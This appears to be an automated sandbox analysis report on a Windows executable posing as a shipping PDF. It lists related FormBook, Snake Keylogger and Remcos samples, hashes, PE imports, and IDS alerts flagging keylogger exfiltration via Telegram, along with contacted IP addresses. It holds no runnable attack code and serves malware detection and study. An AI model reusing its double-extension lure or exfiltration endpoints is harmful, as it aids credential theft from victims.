CLOUDFLARENETUS | #$43557.exe | Get hash | malicious | FormBook | Browse | 104.21.112.1
CLOUDFLARENETUS | Invoice 1425004091.exe | Get hash | malicious | FormBook | Browse | 188.114.97.3
CLOUDFLARENETUS | DHL_AWB#907853880911.exe | Get hash | malicious | FormBook | Browse | 104.21.45.179
CLOUDFLARENETUS | HSBC01703025_PDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.96.1
CLOUDFLARENETUS | BANK SLIP-CTM PDA.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.32.1
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
05af1f5ca1b87cc9cc9b25185115607d | INV000001203.scr | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.112.1
05af1f5ca1b87cc9cc9b25185115607d | QUOTATION_MARQUOTE312025#U00faPDF.scr | Get hash | malicious | MSIL Logger | Browse | 104.21.112.1
05af1f5ca1b87cc9cc9b25185115607d | QUOTATION_FEBQUOTE312025#U00faPDF.scr | Get hash | malicious | MSIL Logger | Browse | 104.21.112.1
05af1f5ca1b87cc9cc9b25185115607d | QUOTATION_FEBQUOTE312025#U00faPDF.scr | Get hash | malicious | MSIL Logger | Browse | 104.21.112.1
05af1f5ca1b87cc9cc9b25185115607d | akXjj2a58b.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.112.1
05af1f5ca1b87cc9cc9b25185115607d | QUOTATION_JANQUOTE312025#U00faPDF.scr | Get hash | malicious | MSIL Logger | Browse | 104.21.112.1
05af1f5ca1b87cc9cc9b25185115607d | VV9lrCk7LE.BAT | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.112.1
05af1f5ca1b87cc9cc9b25185115607d | CUST543324_invoice.pdf.scr | Get hash | malicious | MassLogger RAT | Browse | 104.21.112.1
05af1f5ca1b87cc9cc9b25185115607d | QUOTATION_JANQUOTE312025#U00faPDF.scr | Get hash | malicious | Unknown | Browse | 104.21.112.1
05af1f5ca1b87cc9cc9b25185115607d | 24602711 OR Invoice.pdf.scr | Get hash | malicious | MassLogger RAT | Browse | 104.21.112.1
36f7277af969a6947a61ae0b815907a1 | INV000001203.scr | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
36f7277af969a6947a61ae0b815907a1 | akXjj2a58b.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
36f7277af969a6947a61ae0b815907a1 | 1cRfGAFurK.vbs | Get hash | malicious | Remcos, GuLoader, MailPassView | Browse | 149.154.167.220
36f7277af969a6947a61ae0b815907a1 | Sample.ps1 | Get hash | malicious | Unknown | Browse | 149.154.167.220
36f7277af969a6947a61ae0b815907a1 | Cot90012ARCACONTAL.xls | Get hash | malicious | Remcos | Browse | 149.154.167.220
36f7277af969a6947a61ae0b815907a1 | invoice09850.xls | Get hash | malicious | Remcos | Browse | 149.154.167.220
36f7277af969a6947a61ae0b815907a1 | Xkl0PnD8zFPjfh1.wiz.rtf | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
36f7277af969a6947a61ae0b815907a1 | 2024-HRDCL-0000796.xls | Get hash | malicious | Unknown | Browse | 149.154.167.220
36f7277af969a6947a61ae0b815907a1 | 2024-HRDCL-0000796.xls | Get hash | malicious | Unknown | Browse | 149.154.167.220
36f7277af969a6947a61ae0b815907a1 | DHL Shipment DOCs_002.xls | Get hash | malicious | Unknown | Browse | 149.154.167.220
No context

Process:C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe
File Type:data
Category:dropped
Size (bytes):93696
Entropy (8bit):6.914527220484985
Encrypted:false
SSDEEP:1536:kZ9NWJT5fkWG9CKDkqTdCXzkDfiCKzMeb45fwUjwkvvU+aT8rIjnPg4ujeOkk:kZXWJ9ZNMdUDURWzk51vcOkPg4+eq
MD5:21C7393E0CEB68F93247A94F120D159C
SHA1:9D5E4FFBB467FB223EC92F8828C149BD4F94C1C5
SHA-256:69A3507E33BEF2B15CBD9CFE604D1A040D24B41EAD1D20C7FE6E272FAC2E3F57
SHA-512:42116223605AB76376719F84847D91E89E5DD0FC8F797A1C565D3F6478AD764FCCCD02D239DC2FE2CF232542E440B02660D8B8B172C11B95B9DCE18152E80AAF
Malicious:false
Reputation:low
Preview:tk.T@75BJ3ZD..BS.U0M13GB.EK91UTC75BN3ZDWLBSNU0M13GBQEK91UTC7.BN3T[.BB.G...0..c.-"J.%&,PG##.9%9"-'n7UmCF)b8+k}~.t.XQ'`>WNsLBSNU0MavGB.DH9.;..75BN3ZDW.BQO^1.13#CQEC91UTC7K.O3ZdWLB.OU0Mq3GbQEK;1UPC75BN3ZBWLBSNU0M.2GBSEK91UTA7U.N3JDW\BSNU M1#GBQEK9!UTC75BN3ZDWd.RN.0M13.CQ.N91UTC75BN3ZDWLBSNU0.03KBQEK91UTC75BN3ZDWLBSNU0M13GBQEK91UTC75BN3ZDWLBSNU0M1.GBYEK91UTC75BN;zDW.BSNU0M13GBQk?\I!TC7. O3ZdWLB7OU0O13GBQEK91UTC75bN3:j%?00NU0.43GB.DK97UTCQ4BN3ZDWLBSNU0Mq3G..7.U^6TC;5BN3.EWL@SNU\L13GBQEK91UTC7uBNqZDWLBSNU0M13GBQE+.0UTC75.N3ZFWIB..U0..3GAQEKc1UR..5B.3ZDWLBSNU0M13GBQEK91UTC75BN3ZDWLBSNU0M13GBQ.6.>..^F.3ZDWLBRLV4K9;GBQEK91U*C75.N3Z.WLBdNU0h13G/QEK.1UT=75B03ZD3LBS<U0MP3GB.EK9^UTCY5BNMZDWR@{QU0G..G@yeK9;U~.D.BN9.EWLF lU0G.1GBU6h91_.@75F=.ZD].FSNQCh13M.TEK=..T@.#DN3A+oLBYNV.X73GY{cK;.lTC=5hh3Y.BJBSU..M3.NBQAaoBHTC1..N3P0^LBQ._0M5.Y@y.K9;.v=$5BJ.Znu2VSNQ.M..9WQEO.1.v=!5BJ.Znu2USNQ.M.5m Q7.51%W,V5BH..DWFj.NU6M..G<_EK=3:.C7?dd.Zl.LBUN}fM15Gj.EK?1}.C73BffZDQLhiN}`M15Gj.EK?1..CI.BN7vC).BSJ~&3.3GF.C39

Process:C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe
File Type:data
Category:dropped
Size (bytes):69206
Entropy (8bit):7.923910436166648
Encrypted:false
SSDEEP:1536:8tIkrTIBniMh03U7gKsqv+2cOm6O1TACd8pL2kWyyizdDm4:8VTIRiMh0ssqv+bOm6O1TACd8psbUDm4
MD5:1A8D92684921C0F01E8A7D37852EA386
SHA1:C677F5828F61D44F02BB2A36615555DB4723233E
SHA-256:C32FC74BFBF2E98D049DD92B28E05C7DFE07B2F788051D05B50F45FD116DA8FA
SHA-512:1B4BFF6FD955852F330887E58CBAF95979FA654E1D4AB5C8F9BA1B07D5C0B54378276CA9369832E9A7250D26450AFA091B91023E7BE0CD09D2FE015FC3C38F20
Malicious:false
Reputation:low
Preview:EA06..n..Z..J..kB.L.TMF.S.Uf...B..is..V.C..)..e^.B....Q.....l.V..*......f..U..-.R.2Y4..G...s.,.E-...[m..).N%v....t.V*2{...N..(..v...JD..;.|..5..Ti..vc3...4Z..f)|.|.d..>t..b.3..!...P......]....S....oU..t.%^..6.).....$ ...p*T.0....pt..?..0...<.......Q:=...7...W...v.?.Rd .f.@......O.Q.lT...%..&....h.6|h.....l....>.........R.;..sTZ.2..6W)..?..N..^.r.......(.j.&...Uf....A.6,s..K...........qg.>..F..@..R.U.......R..b..lA... ..h.6%..dt.D..(...bf..O..J.....6+...d....(.*..U.Q.qZ=..e.X*..m.)B.N{@.e.Al..63.=..6.Nf5....F...TJ.2.S.Th`..7.T...}R...).:...L.Vi.nubo3..ov:\.3l.P.[E.gY.P.T*.V.....t..F.a...J..;..L....2.Q.W...f.@...!...{$.E#..u.eV.l#t..FsW..i.)...!...T.o.[l..7..f2Z...5.R#..%^.j...jln.G.W.(....C...M.j...P....1...P*-..1..(sy...f.Q*4.E..}..........`.*t..C...U:U.M3.L..m}.g9......k..h.zE..N.........Q...5..E.G@!...B..lv. ......Z...R....o..>R.s)E..7..)T...h......gC.M@.H.^...l).%..u.T.....3..:7J\.k..P..p.......uViO...+..cW.U.SZ.2cY...y..M..gQp.Bw'.@.
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.858484049794402
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:Shipment Document BL,INV and packing list.pdf.exe
File size:971'776 bytes
MD5:5fd799c047c81a8efb15d9a32f1d8e39
SHA1:fe01653460b4435266a8d3a3bdab26def6a9b2f7
SHA256:ffac68d784d7cd99536b0664ff0a765371c8bf0d0836fce71fa8a29afa9cb5c3
SHA512:71e97cda9b0c205be029726c6c280afedcfacf92f324734945d622f2112e259f85b29cf6745455cca2aad39734257ac05cf43c6576c732d0ab3c2f7fd1fd79d0
SSDEEP:24576:xu6J33O0c+JY5UZ+XC0kGso6Fa5ZzQ5N8yWY:ju0c++OCvkGs9Fa55Q5qY
TLSH:0925AE2273DDC360CB669173BF69B7016EBF3C614630B85B2F980D7DA950162262D7A3
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
Icon Hash:aaf3e3e3938382a0
Entrypoint:0x427dcd
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:0x67D76614 [Mon Mar 17 00:00:20 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:afcdf79be1557326c854b6e20cb900a7
Instruction
call 00007F256C7CD14Ah
jmp 00007F256C7BFF14h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F256C7C009Ah
cmp edi, eax
jc 00007F256C7C03FEh
bt dword ptr [004C31FCh], 01h
jnc 00007F256C7C0099h
rep movsb
jmp 00007F256C7C03ACh
cmp ecx, 00000080h
jc 00007F256C7C0264h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F256C7C00A0h
bt dword ptr [004BE324h], 01h
jc 00007F256C7C0570h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F256C7C023Dh
test edi, 00000003h
jne 00007F256C7C024Eh
test esi, 00000003h
jne 00007F256C7C022Dh
bt edi, 02h
jnc 00007F256C7C009Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F256C7C00A3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F256C7C00F5h
bt esi, 03h
jnc 00007F256C7C0148h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD4 build 31101
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x24b28 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xec000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x24b28 | 0x24c00 | d9fe10679bd9771d4e7edde00484457d | False | 0.8208904655612245 | data | 7.6000179710571585 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xec000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x1bded | data |  |  | 1.000359154497753
RT_GROUP_ICON | 0xeb5a8 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0xeb620 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xeb634 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xeb648 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xeb65c | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0xeb738 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW,
GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                              GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                              COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                              OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Description | Data
Translation | 0x0809 0x04b0

Language of compilation system | Country where language is spoken | Map
English | Great Britain | (flag image)


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-17T11:09:40.070606+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49161 | 132.226.247.73 | 80 | TCP
2025-03-17T11:09:46.217032+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49161 | 132.226.247.73 | 80 | TCP
2025-03-17T11:09:46.712421+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.22 | 49163 | 149.154.167.220 | 443 | TCP
2025-03-17T11:09:46.968357+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.22 | 49163 | 149.154.167.220 | 443 | TCP

• Total Packets: 32
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 17, 2025 11:09:38.940457106 CET | 49161 | 80 | 192.168.2.22 | 132.226.247.73
Mar 17, 2025 11:09:38.945120096 CET | 80 | 49161 | 132.226.247.73 | 192.168.2.22
Mar 17, 2025 11:09:38.945218086 CET | 49161 | 80 | 192.168.2.22 | 132.226.247.73
Mar 17, 2025 11:09:38.946794033 CET | 49161 | 80 | 192.168.2.22 | 132.226.247.73
Mar 17, 2025 11:09:38.951463938 CET | 80 | 49161 | 132.226.247.73 | 192.168.2.22
Mar 17, 2025 11:09:39.618871927 CET | 80 | 49161 | 132.226.247.73 | 192.168.2.22
Mar 17, 2025 11:09:39.647978067 CET | 49161 | 80 | 192.168.2.22 | 132.226.247.73
Mar 17, 2025 11:09:39.652802944 CET | 80 | 49161 | 132.226.247.73 | 192.168.2.22
Mar 17, 2025 11:09:39.854804039 CET | 80 | 49161 | 132.226.247.73 | 192.168.2.22
Mar 17, 2025 11:09:39.873298883 CET | 49162 | 443 | 192.168.2.22 | 104.21.112.1
